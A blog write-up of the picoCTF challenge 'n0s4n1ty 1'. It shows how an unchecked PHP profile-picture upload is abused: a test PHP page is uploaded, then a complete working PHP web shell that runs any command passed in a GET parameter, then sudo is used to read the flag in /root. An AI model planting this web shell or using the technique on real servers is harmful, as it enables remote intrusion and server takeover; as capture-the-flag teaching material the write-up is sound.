[anudeep's space]

n0s4n1ty 1

Apr 06, 20253 min read

Challenge

LinkDifficultyStatus
https://play.picoctf.org/practice/challenge/482?category=1&page=1Static BadgeStatic Badge

Note

Description

A developer has added profile picture upload functionality to a website. However, the implementation is flawed, and it presents an opportunity for you. Your mission, should you choose to accept it, is to navigate to the provided web page and locate the file upload area. Your ultimate goal is to find the hidden flag located in the /root directory.

Additional details will be available after launching your challenge instance.

Solution

Launching the challenge instance you are presented with a image upload form like below First instinct was to check what would happen when we upload an image, I tried uploading an image and monitored the network tab to see what was going on. Looking at the network tab we can see that it’s based on php, and on successful upload of the image it gives you the path to the uploaded file. Next, I had to check if I could access that image and turns out I could. The attack surface is clear, I can upload files and access them. I need to check if there is any file type restriction before I can continue with my attack. The idea I had was to upload a php script and try to access it and see if it’s interpreted as php content or served as plain text. If it is interpreted then we can get a shell on the remote server.

Let us craft a simple php script to check that

<!DOCTYPE html>
<html>
<body>
 
<h1>My first PHP page</h1>
 
<?php
echo "Hello World!";
?> 
 
</body>
</html>

On uploading this file I saw there were no restrictions on filetype. And accessing that content led to it being interpreted as php content.(see how Hello World! is printed). Now the fun part of obtaining a webshell. A quick google search led me to this gist https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985. And the code looks something like below:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>

To explain the above code a bit, it provides a user with an input field to enter a command and on submit submits it to itself and then try to run a command using system.

Time for a quick check. I uploaded the script and tried to access it and tried to run uname -a and execute and we can confirm that it works. From the challenge statement we know that the flag is in /root directory. A quick ls to find the file name(usually called flag), reveals a /root directory but it’s owned by root and we do not have access. Sudoing our way into it reveals that we indeed have sudo access and can access the contents. We can access the flag with sudo again.

Site Map

Graph View

Backlinks